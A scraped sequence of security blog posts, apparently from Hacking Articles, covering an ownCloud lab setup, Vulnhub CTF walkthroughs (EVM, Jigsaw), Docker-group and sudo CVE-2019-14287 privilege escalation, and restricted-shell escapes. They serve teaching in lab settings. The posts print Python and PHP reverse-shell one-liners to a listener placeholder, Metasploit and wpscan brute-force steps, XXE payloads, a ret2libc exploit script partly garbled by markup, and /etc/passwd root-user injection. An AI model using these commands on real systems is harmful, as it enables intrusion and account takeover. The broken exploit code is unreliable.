Cloud computing gives you access to servers, storage, databases, and a broad set of application services over the Internet. A cloud services provider owns and maintains the network-connected hardware required for these application services, while you provision and use what you need via a web application.

Hope, now you have basic understanding of cloud computing. Let’s start the installation of Owncloud in multiple ways.

Installation of Own cloud in Ubuntu

OwnCloud is the market-leading open source software for cloud-based collaboration platforms. As an alternative to Dropbox, OneDrive and Google Drive, ownCloud offers real data security and privacy for you and your data. Store your files in one central location – protected from unauthorized access. Many features designed for absolute data security help you to work productively and securely.

Before start the installation, I want to confirm that you should already have Ubuntu in PC or you can install https://ubuntu.com/download/server.As I already have Ubuntu 18.04 LTS.

Let’s start the journey together with below steps:

Install Apache2

OwnCloud requires a webserver to function. So, we install Apache2 on Ubuntu.

sudo apt install apache2

After apache2 installation, run the commands to disable the directory listing and also to Restart the Apache2 services.

sudo sed -i "s/Options Indexes FollowSymLinks/Options FollowSymLinks/" /etc/apache2/apache2.conf

sudo systemctl restart apache2.service

sudo apt-get install mariadb-server mariadb-client -y

Install the MariaDB Server

MariaDB is the database server. It is an enhanced, drop-in replacement for MySQL. MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of storage engines, plugins and many other tools make it very versatile for a wide variety of use cases.

After installation of MariaDB , restart the service and enable MariaDB service to always start up when the server boots.

sudo systemctl restart mariadb.service

sudo apt-get install software-properties-common -y

Install PHP and its modules

Run the commands to add a third-party repository and upgrade to PHP 7.1

sudo add-apt-repository ppa:ondrej/php

Now, update and upgrade

sudo apt update

Next , we install PHP7.1 and related modules

sudo apt install php7.1 libapache2-mod-php7.1 php7.1-common php7.1-mbstring php7.1-xmlrpc php7.1-soap php7.1-apcu php7.1-smbclient php7.1-ldap php7.1-redis php7.1-gd php7.1-xml php7.1-intl php7.1-json php7.1-imagick php7.1-mysql php7.1-cli php7.1-mcrypt php7.1-ldap php7.1-zip php7.1-curl -y

After instalation of PHP 7.1, open FPM PHP default file.

sudo nano /etc/php/7.1/apache2/php.ini

file_uploads = On

allow_url_fopen = On

Create OwnCloud Database

After insatallation of all the necessary LAMP packages, we will continue to configuring the servers.First we create OwnCloud Database.Below are the steps:

a) Run the mysql commad to logon to the database server.In next prompt , type the root passoword.

b) Create a database called Owncloud.

c) Create a database user e.g nisha with the new password e.g 123(you Should put the strong password for security purpose).

d) Then , we grant the user full access to the database.

e) Finally save your changes and exit.

Note : In database ,command should be end by sign ; otherwise you will get error.

sudo mysql -u root -p

CREATE DATABASE owncloud;

CREATE USER 'nisha'@'localhost' IDENTIFIED BY '123';

GRANT ALL ON owncloud.* TO 'nisha'@'localhost' IDENTIFIED BY '123' WITH GRANT OPTION;

FLUSH PRIVILEGES;

Download Latest Owncloud Release

Visit https://owncloud.com/download/for download and extract OwnCloud Files into the Apache2 root directory .

cd /tmp && wget https://download.owncloud.org/community/owncloud-10.0.8.zip

unzip owncloud-10.0.8.zip

sudo mv owncloud /var/www/html/owncloud/

sudo chown -R www-data:www-data /var/www/html/owncloud/

sudo chmod -R 777 /var/www/html/owncloud/

Then set the correct permissions for OwnCloud to function , change the ownership and mod e.g as we grant (Read Write Execute i.e 777) permission.

Configure Apache2

Configure Apahce2 site configuration file for OwnCloud. This file will control how users access OwnCloud content. Create a new configuration file called owncloud.conf as shown.

sudo nano /etc/apache2/sites-available/owncloud.conf

ServerAdmin admin@example.com

DocumentRoot /var/www/html/owncloud/

ServerName hackingarticles.in

ServerAlias hackingarticles.in

Alias /owncloud "/var/www/html/owncloud/"

Options +FollowSymlinks

AllowOverride All

Require all granted

Dav off

SetEnv HOME /var/www/html/owncloud

SetEnv HTTP_HOME /var/www/html/owncloud

ErrorLog ${APACHE_LOG_DIR}/error.log

CustomLog ${APACHE_LOG_DIR}/access.log combined

Then copy and paste the content below into the file and save it. Replace the highlighted in yellow lines with your own domain name and directory root location and then save the file.

Enable the OwnCloud and Rewrite Module

After configuring the VirtualHost above, enable it by running the commands below and at last restart the Apache2 service.

sudo a2ensite owncloud.conf

sudo a2enmod rewrite

sudo a2enmod headers

sudo a2enmod env

sudo a2enmod dir

sudo a2enmod mime

sudo service apache2 restart

Open the browser and put localhost(local IP ) e.g http://localhost /owncloud

You’ll be prompted to create admin account and password. Connect to the database using the information you created and then click on finish setup.

Put the admin Credentials and continue.

Happy to see the final Picture of OwnCloud, now you can upload and store your data safely on Owncloud.

Installation of OwnCloud using Docker

Docker is a tool designed to make it easier to create, deploy, and run applications by using containers. Containers allow a developer to package up an application with all of the parts it needs, such as libraries and other dependencies, and ship it all out as one package.

Let’s start the installation with the below steps :

Install Docker

To install docker, simply open the terminal of Linux and type the following command:

apt install docker.io

Once the docker is up and running, you can run or pull any image in your docker.As per the requirement we are going to search owncloud image. When you run the following command, it will first check your local repository; if the image is not available there then it will pull it from docker hub.

docker search owncloud

Once you find your image, you can pull it into your container and download the Owncloud image.

docker pull owncloud

The docker attaches command permits you to attach to a running container using the container ID or name you can use one instance of shell only though attach command or you can directly run container with container id.ownCloud is accessible via port 8080 on the host machine. But if you crave to open new terminal with new instance of container’s shell, we just need run docker exec.

docker run -d -p 8080:80 owncloud

To log in to the ownCloud UI, open http://localhost:8080 in your browser of choice, where you see the standard ownCloud login screen, as in the image below.

Finally welcome to your OWNCLOUD platform to perform your services (upload, safety storage of data etc.)

Bitnami Owncloud Stack Virtual Machines

Bitnami Virtual Machines contain a minimal Linux operating system with ownCloud installed and configured. Using the Bitnami Virtual Machine image requires hypervisor software such as VMware Player or VirtualBox. Both of these hypervisors are available free of charge.

You can download from here

Username: bitnami

Password: bitnami

It very simple, only just navigate to the web browser and explore VM IP as shown below.

↧

EVM: 1 Vulnhub Walkthrough

November 19, 2019, 7:21 am

≫ Next: Docker Privilege Escalation

≪ Previous: Multi Ways to Setup Cloud Pentest Lab using OwnCloud

In this article, we will solve EVM lab. This lab is designed by Ic0de and it is an easy lab as the author has intended it beginners. You can download the lab from here.

Penetration Methodologies:

· Network Scanning

o Netdiscover

o Nmap Scan

· Enumeration

o Browsing HTTP Service

o Directory Bruteforce using dirb

o Enumeration Using WPScan

o Password Bruteforce using WPScan

o Getting Login Credentials

· Exploitation

o Exploiting using Metasploit

o Getting a reverse connection

o Spawning a TTY Shell

o Enumeration for Root Credentials

· Privilege Escalation

o Getting Login Credentials

o Logging in as root

o Reading the Final Flag

Walkthrough

Network Scanning

First we will find the IP address of our target machine and for that please use the following command as it helps to see all the IP’s in an internal network:

netdiscover

As you can see from the above image, our target IP is 192.168.1.103. Now that we know target IP, we can move on to scanning our target so that step by step we can attack further and gain control of the machine and scanning will help us to find an opening. We will scan with the help of nmap and for that use the following command:

nmap -A 192.168.1.103

With the help of nmap we observed that port number 22, 53, 80, 110, 139, 143, 445 are open with the services of SSH, DNS, HTTP, POP3, NETBIOS, IMAP and NETBIOS respectively.

Enumeration

As port 80 is open, let us try and open the IP in browser as shown in the image below:

The apache webpage opens which is normal except for the fact that there was a comment saying “you can find me at /wordpress/ im vulnerable 😊“

Now according to this comment, it means there is a vulnerable directory called ‘wordpress’. So to confirm we used dirb command which is:

dirb http://192.168.1.103/

And to no surprise, there is a directory called ‘wordpress’. Now this is wordpress, as the name suggests, we can use wpscan to find more about it. And for this, type:

wpscan --url http://192.168.1.103/wordpress/ -e at -e ap -e u

With this command, we are telling the wpscan to enumerate(-e) all themes(at), all plugins(ap) installed on the wordpress site. And finally all the users(u) that might be logged in on the Wordpress Site.

As you can see in the image below, there is a vulnerable plug in c0rrupt3d_brain where we can attack via bruteforce and get a password to log in.

So, for our bruteforce, we will use rockyou wordlist and to put it in action type:

wpscan --url http://192.168.1.103/wordpress -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt

And when the bruteforce is successful, it will give you the password i.e. 24992499; which is shown in the image below too:

Exploitation

Now that we know username and password, we can use an inbuilt wordpress exploit from Metasploit. Firstly, start Metasploit by typing ‘msfconsole’ and the type the following command:

use exploit/unix/webapp/wp_admin_shell_upload

set rhosts 192.168.1.103

set targeturi /wordpress

asset username c0rrupt3d_brain

set password 24992499

exploit

So, once the exploit is running and attack is successful, you can will have your meterpreter session. When you have the meterpreter session, go to home by typing cd /home and check list of things home has to offer by using ls command. There was only on folder there named root3r and when you navigate yourself to that folder and check the list of files with the same command you used before. Here, you will find .root_password_ssh.txt file; upon reading this text file with cat you will find the password of the root user just its shown in the image below:

cd /home

cd root3r

cat .root_password_ssh.txt

Privilege Escalation

Now, we know that the password of the root user is willy26. We can now switch our user to root and for this type:

shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

su root

willy26

Now, you are logged in as root along with its privileges too. As you can see in the image below:

One you are logged in as a root user, navigate yourself around and go to the root folder by typing cd /root. And there when you will use ls command, you find a proof.txt document. Upon reading it with cat command, it will show you that you have successfully pwned the machine. YAY!!!!!!

↧

Docker Privilege Escalation

November 20, 2019, 1:19 am

≫ Next: Multiple Methods to Bypass Restricted Shell

≪ Previous: EVM: 1 Vulnhub Walkthrough

In our previous article we have discussed “Docker Installation & Configuration”but today you will learn how to escalate the root shell if docker is running on the hots machine or I should say docker privilege escalation to spawn root shell.

While we know that there is an issue with the docker that all the commands in docker require sudo as docker needs root to run. The Docker daemon works in such a way that it is allowed access to the root user or any other user in the particular docker group. This shows that access to the docker group is the same as to give a constant root access without any password. 🧐

Quick Lab setup

Execute below conmand to install docker in your local host machine. I have used ubutn 18.04 here as target machine.

apt install docker.io

Create a local user, say Ignite is the username with least privileges add new group “docker” for “ignite”.

adduser ignite

usermod -G docker ignite

newgrp docker

To proceed for privilege escalation, you should have local access of the host machine, therefore here we choose ssh to access the machine as ignite who is a local user on this machine.

ssh ignite@192.168.1.6

Since we have access to the user which is a part of the docker group and said above if the user is part of the docker group then it is the same as to give a constant root access without any password. 😈

We ran the command shown below, this command obtains the alpine image from the Docker Hub Registry and runs it. The –v parameter specifies that we want to create a volume in the Docker instance. The –it parameters put the Docker into the shell mode rather than starting a daemon process. The instance is set up to mount the root filesystem of the target machine to the instance volume, so when the instance starts it immediately loads a chroot into that volume. This gives us the root of the machine. After running the command, we traverse into the /mnt directory and found out flag.txt.

docker run -v /root:/mnt it alphine

Similarly, an intruder can mount other system files to escalate the privilege for local user such as he can mount the passwd or shadow or ssh-key.

As you can see here, we try to mount mount /etc directory to obtain shadow file and similarly one can access passwd file and add his own privilege user. 🤔

docker run -v /etc/:/mnt -it alpine

cd /mnt

cat shadow

So, if you have access shadow file then you can try to crack passwd hashes and if you have access passwd file you can add you own privilege user by generating password salt as shown here.

openssl passwd -1 -salt raj

Now a new record inside the passwd file for your user.

docker run -v /etc/:/mnt -it alpine

cd /mnt

echo ‘raj:saltpasswd:0:0::/root:/bin/bash’ >>passwd

tail passwd

From the given below image you can observe that now we have user raj as member of root. Thus, we switch to as raj and access the root shell.

Thus, in this way we can escalated the permission of a host machine, hope you will enjoy this little and powerful post. 😊

↧

Multiple Methods to Bypass Restricted Shell

November 22, 2019, 8:19 am

≫ Next: Jigsaw:1 Vulnhub Walkthrough

≪ Previous: Docker Privilege Escalation

We all know the Security Analyst-Hacker relationship is like "Tom & Jerry" where one person takes measures to step-up the security layer and another person tries to circumvent it. The same situation that I slowly resolved while solving CTF challenges where always a new type of configuration error help me learn more about poor implementation of protection.

In this post we will talk about "restricted shell or bash," which is used in many ctf challenges and learn to bypass rbash by multiple methods.

Following CTF Challenges using rbash:

· Happycorp:1 Vulnhub Walkthrough

· Development: Vulnhub Walkthrough

Table of Content

· Restricted shell

· Restrictions with in rbash

· Pros of restricted shell

· Cons of restricted shell

· Multiple method to bypass rbash

Restricted Shell: rbash

A restricted shell is used to set up an environment more controlled than the standard shell which means If bash is started with the name rbash, or the -r option is supplied at invocation, the shell becomes restricted.

Restrictions with in rbash

It behaves identically to bash with the exceptionthat the following are disallowed or not performed:

§ cd command (Change Directory)

§ PATH (setting/ unsetting)

§ ENV aka BASH_ENV (Environment Setting/ unsetting)

§ Importing Function

§ Specifying file name containing argument ‘/’

§ Specifying file name containing argument ‘-‘

§ Redirecting output using ‘>‘, ‘>>‘, ‘>|‘, ‘<>‘, ‘>&‘, ‘&>‘

§ turning off restriction using ‘set +r‘ or ‘set +o‘

Pros of Restricted Shell

· Rbash is often used in combination with a chroot jail in an additional attempt to restrict access to the entire process.

Cons of Restricted Shell

· When a shell script command is executed, rbash cuts off any constraints in the spawned shell to execute the code.

· Inadequate to allow fully untrusted code to be executed.

Enable restricted shell for a user

As said above the rbash will control the access of bash shell for a user and allow to execute trusted command only which means the login user can run some selected command only. In order to control the user bash command, execute or enable the restricted shell for any user follow the below steps:

1. Create a local user “ignite”

2. Set password

3. Set usermod to enable rbash for local user.

4. Ensure accessible shell for the user with the help of /etc/passwd.

adduser ignite

usermod -s /bin/rbash ignite

Method to Bypass rbash

1. Bypass rbash using Editors

· Vi-editors

· Ed-editors

2. Bypass rbash using One liner

· Python

· Perl

· Awk

3. Bypass rbash through Reverse Shell

4. Bypass rbash using System bnaries

· More

· Less

· Man

5. Bypass rbash using Expect

6. Bypass rbash through SSH

Bypass rbash using Editors

Now suppose you have accessed the host machine as a local user and found the logged user is part of rbash shell thus you are unable to run some system commands, such as: cd (change directory) because due to rbash it is restricted.

Now the question is: Then what will you do in such situation? 🤔

And the answer is: Use “Editors Programs” to bypass the restricted mode. 😇

1^st method – VI Editor

So you can use the VI editor and this will be in the edit mode where you need to run the following command to open the "sh: Bourne shell" instead of rbash.

:set shell=/bin/sh

:shell

Now if you will try to access /etc directory then you will saw that you are able to run cd & pwd command as shown below.

cd /etc

pwd

2^nd method- ed-Editor

You can also go with ed-editor which very easy to use as this is same as cat program that will provide inline edit mode where you can use following command to call "sh: Bourne shell"

! ‘/bin/sh’

Now again if you will try to access /etc directory then you will saw that you are able to run cd & pwd command as shown below.

cd /etc

pwd

There many more editors such as pico or nano which you should by yourself to bypass rbash environment.

Bypass rbash using One liner

1^st Method Python

You can also choose python following command as one liner to import "sh: Bourne shell" and spawn the proper sh shell instead of rbash as shown below where we are able to access the /etc directory without any restriction.

python -c 'import os; os.system("/bin/sh");'

python3 -c 'import os; os.system("/bin/sh");'

2^st Method Perl

Similarly, you can also choose perl following command as one liner to import "sh: Bourne shell" and spawn the proper sh shell instead of rbash as shown below where we are able to access the /etc directory without any restriction.

perl -e 'system("/bin/sh");'

3^rd Method- Awk

Similarly, you can also choose awk following command as one liner to import "sh: Bourne shell" and spawn the proper sh shell instead of rbash as shown below where we are able to access the /etc directory without any restriction.

awk 'BEGIN {system("/bin/sh")}'

Bypass rbash through Reverse Shell

1^st-Method Python

You can also choose reverse shell code to bypass rbash, here we have use python reverse shell code (penetestmokey) and this will throw the "sh: Bourne shell" to the listen machine (Kali Linux in our case) on the netcat which is listening over our Kali Linux.

nc -lvp 1234 {kali Linux}

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("LISTENING IP",LISTENING PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now if you will try to access /etc directory then you will saw that you are able to run cd & pwd command as shown below.

cd /etc

pwd

2^nd Method – PHP

Similarly, you can use PHP reverse shell code which need to be execute on the host machine and reverse connection will be accessible on Listening IP.

php -r '$sock=fsockopen("LISTENING IP",LISTENING PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

Now if you will try to access /etc directory then you will saw that you are able to run cd & pwd command as shown below.

cd /etc

pwd

Bypass rbash using System bnaries

Very few people know this, that some system binaries program (such as less, more, head, tail, man and many more) are very useful to bypass restricted environment.

Consider a situation where you a log file named ignite.txt inside the current directory and you allow to only few commands such as more or less to read the logs.

1^stMethod-/bin/more

Take the privilege of /bin/more program to bypass the restricted environment by executing following command on the rbash shell

more ignite.txt

!’sh’

Now if you will try to access /etc directory then you will saw that you are able to run cd & pwd command as shown below.

cd /etc

pwd

cd /etc

pwd

2^nd Method-/bin/less

Take the privilege of /bin/less program to bypass the restricted environment by executing following command on the rbash shell

less ignite.txt

!’sh’

Now if you will try to access /etc directory then you will saw that you are able to run cd & pwd command as shown below.

cd /etc

pwd

cd /etc

pwd

3^rd Method-/bin/man

Take the privilege of /bin/less program to bypass the restricted environment by executing following command on the rbash shell

man man

!’sh’

Now if you will try to access /etc directory then you will saw that you are able to run cd & pwd command as shown below.

cd /etc

pwd

cd /etc

pwd

Bypass rbash using Expect

Expect is a Unix program that "talks" to other interactive programs according to a script. Following the script, expect knows what can be expected from a program and what the Correct response should be.

Take the privilege of /bin/usr/expect program to bypass the restricted environment by executing following command on the rbash shell.

expect

spwan sh

Now if you will try to access /etc directory once again then you will saw that you are able to run cd & pwd command as shown below.

cd /etc

pwd

cd /etc

pwd

Bypass rbash through SSH

If you know the ssh credential of the user who is part of rbash shell, then you can use following command along ssh to break the jail and bypass the rbash by accessing proper bash shell.

ssh ignite@192.168.1.103 -t “bash --noprofile”

Now if you will try to access /etc directory once again then you will saw that you are able to run cd & pwd command as shown below.

cd /etc

pwd

cd /etc

pwd

Reference: http://manpages.ubuntu.com/manpages/cosmic/man1/rbash.1.html

↧

Jigsaw:1 Vulnhub Walkthrough

November 24, 2019, 10:22 pm

≫ Next: SUDO Security Policy Bypass Vulnerability - CVE-2019-14287

≪ Previous: Multiple Methods to Bypass Restricted Shell

Hello guys, today we will face a slightly more complex challenge. Introducing the Jigsaw: 1 virtual machine, the first of the "Jigsaw" series created by "Zayotic" and available on Vulnhub. This is another boot2root-style challenge where we have to escalate privileges to the "root user" and capture a flag to complete the challenge.

Level: Hard to Insane

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from thislink.

Penetration Methodologies:

· Network Scanning (Part 1)

o ARP Scan

o TCPDump

· Enumeration (Part 1)

o Netcat

o Reading the Flag1

· Network Scanning (Part 1)

o Port Knocking

o Nmap Scan

· Enumeration (Part 2)

o Browsing HTTP Service

o Hidden Information in GIF image

· Exploitation

o XXE Attack in Form Login

o Port Knocking

o Getting a SSH Connection

o Enumeration Files and Directories

o Reading the Flag2

· Post Exploitation

o Getting Login Credentials

o Enumeration for SUID binaries

· Creating Exploit

o Overview Buffer Overflow Return-to-Libc

o Check Buffer length

o First Payload Script

o Get System, exit and /bin/sh addresses

· Privilege Escalation

o Execute Exploit Created

o Confirm Root Access

o Reading the Final Flag (Flag3) in /root/gameover.txt

Walkthrough

Network Scanning (Part 1)

First, we will find the IP address of our target machine and for that please use the following command as it helps to see all the IP’s in an internal network through of a specific network interface:

arp-scan --localnet --ignoredups

We found the target IP Address 192.168.138.100.

Normally, we would start a basic port scan (using nmap or another tool) for services or some vulnerability. However, the author of this box leaves a subtle tip stating to pay more attention to ARP packages. We can read this hint in the box description before downloading it:

So, we can listen to network traffic through tools such as Wireshark or TCPDump. For example, using the following command we can listen to traffic through the terminal, filtering for ARP packets:

tcpdump -A -n host 192.168.138.100 and arp

We may notice that after a while we did not receive much useful information. We can then deduce that it could be a fake tip or at least a trick question. With this understanding, we can try to “exclude all ARP traffic from this capture” using the following command:

tcpdump -A -n host 192.168.138.100 and not arp

A few seconds after the previous command has been executed, we may see a different message coming out of UDP port 666 in this box.

Enumeration (Part 1)

Apparently we may have some password in leet mode or something expected with this feature. That way, we can perform a basic test on UDP port 666 using Netcat to identify some useful information with the following command:

nc -u 192.168.138.100 666

We can see that after testing a few words, we get ciphertext when we send “j19s4w” (leet mode). The message appears to be base64 encoded. Using the following command, we can send the right word and try to decipher the content of the received message:

python -c "print 'j19s4w'" | nc -u 192.168.138.100 666 -q1 | base64 -d

flag1{3034cc2927b59e0b20696241f14d573e}

We managed to capture the first flag and at the same time a tip to continue the exploration.

Moving on to the next tip, you will need to perform a procedure known as “Port Knocking”.

Network Scanning (Part 2)

Using the script below, we hit the indicated ports in the correct sequence using Nmap:

for knock in 5500 6600 7700; do nmap -Pn --host-timeout 201 --max-retries 0 -p $knock 192.168.138.100; done

Alternatively, you can also perform the "Port Knocking" process with the "Knock" command, according to the following syntax:

knock 192.168.138.100 5500 6600 7700

Now, that we have knocked on the correct ports and sequence, generally the protection system frees access to other server ports. In order to guarantee and test, we can perform a basic port scan using Nmap with the following command:

nmap -A -T4 -p- 192.168.138.100

Thus, we can see that after "Port Knocking", the system opened access to TCP port 80.

Enumeration (Part 2)

As port 80 is open, let us try and open the IP in the browser as shown in the image below:

While there appears to be nothing on this page, we can proceed to parse the source code for useful information.

We can also search for files and directories in the "/robots.txt" file:

So far, none of the visible information we have found has taken us anywhere. We can also try to search directories and files through webcrawlers like Dirsearch, Gobuster, Dirb, et.al., unfortunately this procedure in this box will not return any known directories through common dictionaries.

If we take into account the “thinking outside the box” common in CTF challenges, when faced with images and data files, the idea of “steganography”, data hidden in other files, comes up. Finally, we can also try to analyze the GIF image used as the background of this page.

With the following command, we can download this image to our attacking machine:

wget -c http://192.168.138.100/jigsaw.gif

We can use the "file" command to verify that the file type is different than expected.

In addition, it is also indicated to look for apparent "strings" in the file structure using the following command:

file jigsaw.gif
strings jigsaw.gif

After analyzing the various exposed "strings" of this file, we reach the last line. This line, quite different from the previous ones, besides being larger, has a structure similar to the division of directories in common URL format.

It seems that this is a new way and so we can test right in the browser.

http://192.168.138.100/w4n770p14y494m3/

Now that we have discovered a new environment, we have access to a login form. After some testing, whenever we enter an incorrect user, the form displays an error message, as shown below.

As usual, we can evaluate the source code for any information that may be any hint or developmental flaw, such as a comment, link, path, etc.

Here we have an XML function that handles this login form. And if you are already an experienced CTF challenge practitioner or keep up to date on new attacks, you may have realized that we will probably be able to exploit this environment using some “XML External Entity Attackor XXE Attack”.

Exploitation

Apparently, this environment “may” be vulnerable to attacks of the XXE type. This way we can try to alter the original request and manipulate this data in order to get sensitive information from inside the server.

To test the environment, we can intercept the original request (with a proxy like Burpsuite) and change this data by inserting a payload. To assist in this step, we can use some payload available on “PayloadsAllTheThings” through Github.

Below is an example of a common request whenever we try to log in by default through the browser. For example, by entering the following email "admin@jigsaw.local" with the password "admin":

admin@jigsaw.localadmin

Understanding this request and response process, we can manipulate data sent via the HTTP POST method and submit our payload. The payload below was built for this tutorial example. Basically, if the application is vulnerable it will return the contents of the file "/etc/passwd".

]>&my_email;

Now that we have Proof of Concept (PoC), we can then continue exploring. Also, we already know that there is a user named “jigsaw” with login permission for this machine.

As this is an access made through the “Port Knocking” protection feature, it is ideal to read the information of the configuration file of this service located at: "/etc/knockd.conf".

For this, we can only change the file to be read, informing in the payload, the desired configuration file:

]>&my_email;

The file returned some settings for opening and closing specific ports using Port Knocking. In addition, we also have the sequence to also allow access to port 22 for SSH.

Now that we know how to release SSH, let's test and explore this service. We have done this before using a basic script to "knock" in sequence and correct ports. However, alternatively we can execute “knock” command to perform this procedure as shown below:

knock 192.168.138.100 7011 8011 9011
nmap -A -T5 -p22 192.168.138.100

Now we can try to access this service. We have at hand the user "jigsaw" but not much information about the likely password. However, if you come back a little earlier, during the Network Sniffing procedure, we capture a message via the UDP protocol.

Username: jigsaw
Password: j19s4w

So, with the credentials in hand, just test and validate access.

ssh jigsaw@192.168.138.100 -p22
password: j19s4w

Post Exploitation

Once we access the machine, we can list the contents of the current directory, looking for files that can provide more information or tips.

Great, we got the second flag of this challenge easy. Besides, we already know that there is still one last challenge.

flag2{a69ef5c0fa50b933f05a5878a9cbbb54}

The current user has no administrative permissions and apparently we will need to go up a privilege level and get access from the "root user". We can navigate between directories and search for files and folders with write, read and execute permissions, search for SUDO permissions and also for executables with SUID and / or GUID.

Unfortunately, this user is not allowed to execute commands through SUDO permissions.

sudo -l

Another alternative is to look for SUID / GUID executables.

find / -perm -u=s -type f 2>/dev/null

The search for SUID executables brought us a very interesting binary: “/bin/game3”.

This binary gives us an idea that we are on the right track, because if you check the paths so far, this will be the 3rd challenge.

It is a ELF 32bits file, ie an executable for Linux. We could look for strings, test outputs and other methods: everything is valid. However, advancing the process, after some tests (entering several data as input), we can identify a possible stack overflow, ie, this binary is probably vulnerable to “Buffer Overflow”.

Creating Exploit

I confess to you that my knowledge of binary exploration and reverse engineering in ELF is quite basic, but I am working to evolve this skill.

Let's take a moment to analyze the return of the "file" command to better understand each step below.

/bin/game3
file /bin/game3

The result of executing the command shows that we have a 32-bit executable ELF, dynamically linked (linked with libc includes) and not-stripped (meaning it contains all the debugging information).

Since the target machine does not have an internal debugger (like GDB), we can copy the binary to the attacking machine and try to exploit this binary there to create our exploit. This is "BoF Ret2Libc (Return-to-libc)".

The command below copies the torque from the target machine to the attacking machine:

scp jigsaw@192.168.138.100:/bin/game3 /destination_path

Check Buffer length

We know that after entering certain amounts of characters the executable returns “segmentation failure”, an overflow. However, if we test one character at a time until we find the correct amount, we will lose a lot of time.

Therefore, it is faster to use gdb-peda'pattern_create' and 'pattern_offset' functions to identify the pattern and how much overflow occurred.

After executing the binary with the pattern created with 200 characters (pattern_create 200), an overflow is returned at address: 0x41344141. We can look at the image below and check the pattern that filled the EIP.

With the pattern_offset function we will identify how much the burst actually occurred. Just tell the function the value (default) that went to the EIP.

We now know that the number of characters to replace and fill theEIP is 76. This is the sizeof our Buffer.

Therefore, we will begin our exploration. For this exploit we will use the python language, as it has execution permission on the target machine. If you want to better understand the payload creation process to exploit the ret2libc attack, you can use the article posted on the SpZ blog as a guide.

First Payload Script

In order to test, let's develop our first payload and test. Below is a basic python payload example:

import struct
buf = "A" * 76
buf += struct.pack("print buf

Let's save this payload to some "file.py " and run it on gdp-peda.

We were able to fill in the EIP with the data we sent. So notice that the Exit Address has been manipulated.

Get System, exit and /bin/sh addresses

To override the EIP and inject our shell, we still need to get 3 more addresses: Libc System Address, Libc Exit Address, Libc “/bin/sh” Address.

So we should go back to the target VM and we will develop the payload within it. It is recommended to access any directory that the current user has write permission to, such as “/tmp”.

At the target VM, we will type the commands below to collect the respective addresses for Libc:

ldd /bin/game3 | grep libc
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh

We now have the following addresses:

Libc Base Addr: 0xb7557000
Libc System Addr: 0x00040310
Libc Exit Addr: 0x00033260
Libc /bin/sh Addr: 0x00162d4c

To create our exploit, let's edit a file.py (same xpl.py, for example) in the directory we chose earlier. Below is a code example for our payload. It's no use wanting to copy and place the code that probably the addresses will be different in your environment:

from subprocess import call
import struct

base_addr = 0xb7557000
sys_addr = struct.pack("exit_addr = struct.pack("shell_addr = struct.pack("

buf = "A"*76
buf += sys_addr
buf += exit_addr
buf += shell_addr

i = 0

while(i<512 br="">    print(“Trying: %s” % (i))
    i += 1
    ret = call(["/bin/game3", buf])512>

Privilege Escalation

Now we can test our exploit and see if we can scale privileges. To do this, we can execute it with the following command:

python xpl.py

If after running the exploit, do not load the shell "sh". We can change the value of the "base_addr" variable. This is the corresponding value for "Libc Base Address". We can use the command we already saw for this, or simply run the exploit again to try to get root access.

After performing the payload, wait a few seconds. Since no feedback text has been added to your screen, the while loop will keep trying until you can inject the payload.

We can see that there is a file named "gameover.txt" inside the "root user" directory.

Final Considerations

We hope this guide has contributed to your learning and knowledge and if possible shares with your network of friends and partners.

Thanks for your patience in reading this walkthrough until the end !!

Author: André Henrique is a Cybersecurity and IT Consultant, Network Security Specialist, Pentester, Speaker and Writer at Hacking Articles. Contact Here.

↧

SUDO Security Policy Bypass Vulnerability - CVE-2019-14287

November 25, 2019, 12:37 am

≫ Next: Linux for Pentester: Perl Privilege Escalation

≪ Previous: Jigsaw:1 Vulnhub Walkthrough

After the detection of a major security vulnerability, Official released an immediate security fix to the ' sudo ' kit in the Ubuntu repositories. If you are not aware of sudo right’s power then read this post “Linux Privilege Escalation using Sudo Rights” that help you to understand more above “CVE-2019-14287” the latest vulnerability which we will discuss in this post.

In sudo before 1.8.28 the vulnerability CVE-2019-14287 is a security policy bypass issue in Linux/Ubuntu before 19.10 that offers a local user or a program the ability to carry out commands as root or super user on a Linux system when the "sudoers configuration" clearly prohibits the root access.

For example, this allows bypass of “! Root” configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.

Exploiting CVE-2019-14287

Victim’s Machine

Let’s suppose the system admin has created a local user who is not allow to perform high privilege task such as “cat /etc/shadow” to read saved the password of the system.

Similarly we have created a user “demo” who is not able to run privilege task as super user.

But if admin will make the following configuration with the suoders file:

demo ALL=(ALL,!root) ALL

where admin has assign sudo rights to the user “demo” to run programs or command as super user other than root and clearly prohibits the root access using !root.

Or the system admin can use following configuration too which stats same permission as said above.

demo ALL=(ALL,!#0) ALL

Let understand once again what is sudo right and what it defines as configured above by taking help of the following image:

Username: demo

Host: ALL

Runas (user): ALL,!root

Runas(group): ALL,!root

Tag: NOPASSWD

Command to execute: ALL

So basically here demo is define to execute ALL command as ALL (User,Group) other than root (User,Group) and “ALL,!root” is misconfiguration and causes the security loopholes because the user demo is restricted to perform task as root but not as admin. As result he can run a command as administrator (user "root") .

In other words, this fault gives the privilege of a local user (attacker) accessing root shell as demonstrated. Assume the attack has the host machine shell as local user and he found above mentioned sudo rights then the attacker can easily escalated the root privilege by using privilege user’s id i.e. -u#-1

sudo -u#-1 /bin/bash

↧

Linux for Pentester: Perl Privilege Escalation

November 26, 2019, 8:03 am

≫ Next: djinn:1 Vulnhub Walkthrough

≪ Previous: SUDO Security Policy Bypass Vulnerability - CVE-2019-14287

Here we are again came back with one of very essential command i.e. “Perl”. As we know perl has it’s significant in the era of programming language specially designed for text editing. Apart from all of this, now it is also vary prominent for a variety of purposes including Linux system administration, network programming, web development, etc. So keeping this fact into our mind we will proceed to this article that how we can take more advantage of this command in the operation of Privilege Escalation.

